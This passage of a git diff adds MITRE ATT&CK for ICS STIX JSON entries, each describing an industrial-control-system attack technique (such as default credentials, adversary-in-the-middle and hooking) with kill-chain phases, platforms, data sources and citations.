@@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--7aa08273-52b9-4b82-b3f6-617ed4d9e06d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)\n\nICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. 
(Citation: Joe Slowik April 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0866", + "external_id": "T0866" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Exploitation of Remote Services Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1210/" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349.json new file mode 100644 index 0000000000000000000000000000000000000000..359271b82155203612ea0fedc3da0e65683df662 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--b7ba66ba-494c-478e-b1a3-cdf6de52f89f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Default Credentials", + "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/techniques/T0812", + "external_id": "T0812" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c.json new file mode 100644 index 0000000000000000000000000000000000000000..bb8e32f41fde7da00cc3bdb9b0b5daf8cfcad726 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--ef731c50-a798-451f-bad0-df5e40189e73", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:16:55.602Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. 
(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0822", + "external_id": "T0822" + }, + { + "source_name": "Daniel Oakley, Travis Smith, Tripwire", + "description": "Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30 ", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4.json new file mode 100644 index 0000000000000000000000000000000000000000..28c80fe0e3b5541fa89e7ee74026bab9a7bb561e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--30d736b6-02a2-4192-9180-1bc91974058e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-29T16:17:27.903Z", + "name": "Brute Force I/O", + "description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. \n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0806", + "external_id": "T0806" + } + 
], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541.json new file mode 100644 index 0000000000000000000000000000000000000000..2dfd5a08a0108628e48bddf7230a6402f376835e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--b8f0d777-2c46-4ca4-889c-5a6c2bfb4dce", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Detect Program State", + "description": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0870", + "external_id": "T0870" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b.json new file mode 100644 index 0000000000000000000000000000000000000000..68f7edaa69634f012e7768394450a66c66bab954 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--e94c0411-193f-4125-9eca-bdf4137bd992", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) \n\nAn AiTM attack may allow an adversary to perform the following attacks: \n[Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Conrad Layne - GE Digital" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Windows Registry: Windows Registry Key Modification", + "Service: Service Creation", + "Application Log: Application 
Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0830", + "external_id": "T0830" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Gabriel Sanchez October 2017", + "description": "Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03.json new file mode 100644 index 0000000000000000000000000000000000000000..57dabfa7b41be05660fa1ab409d3c959a57772c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--19652c3e-f3ae-4889-8ecb-5d3b79be5cb3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation for Evasion", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. \n\nAdversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0820", + "external_id": "T0820" + } + ], + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb.json new file mode 100644 index 0000000000000000000000000000000000000000..3ac08725596db6ec2841068b1ef657306e3632a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--853fdbb2-8d3f-4b90-a75c-ac8549b0e566", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Control", + "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0827", + "external_id": "T0827" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information 
Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a.json new file mode 100644 index 0000000000000000000000000000000000000000..1f050455bb68f3c27469831fcc04fb9535fad0f9 
--- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--02373bd0-2884-45ee-968c-1206cda5aab2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Change Program State", + "description": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0875", + "external_id": "T0875" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae.json new file mode 100644 index 0000000000000000000000000000000000000000..93473ba7aceb33fa8a3e814d01f1b10a3c49f25a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--16ee109f-a60c-4abb-8341-abf69cad8954", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T13:32:08.619Z", + "name": "Hooking", + "description": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)\n\nOne type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Process: Process Metadata", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0874", + "external_id": "T0874" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Hooking Retrieved. 
2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1179/" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45.json new file mode 100644 index 0000000000000000000000000000000000000000..a0aff59be75056cf8a79bea17b2a58e64bf869d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--64422d00-2f11-45e6-a901-02726445ba58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Control Device Identification", + "description": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0808", + "external_id": "T0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7.json new file mode 100644 index 0000000000000000000000000000000000000000..9f28911a64eb6ea0fa9346ff56c136e41bfb1db5 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7.json 
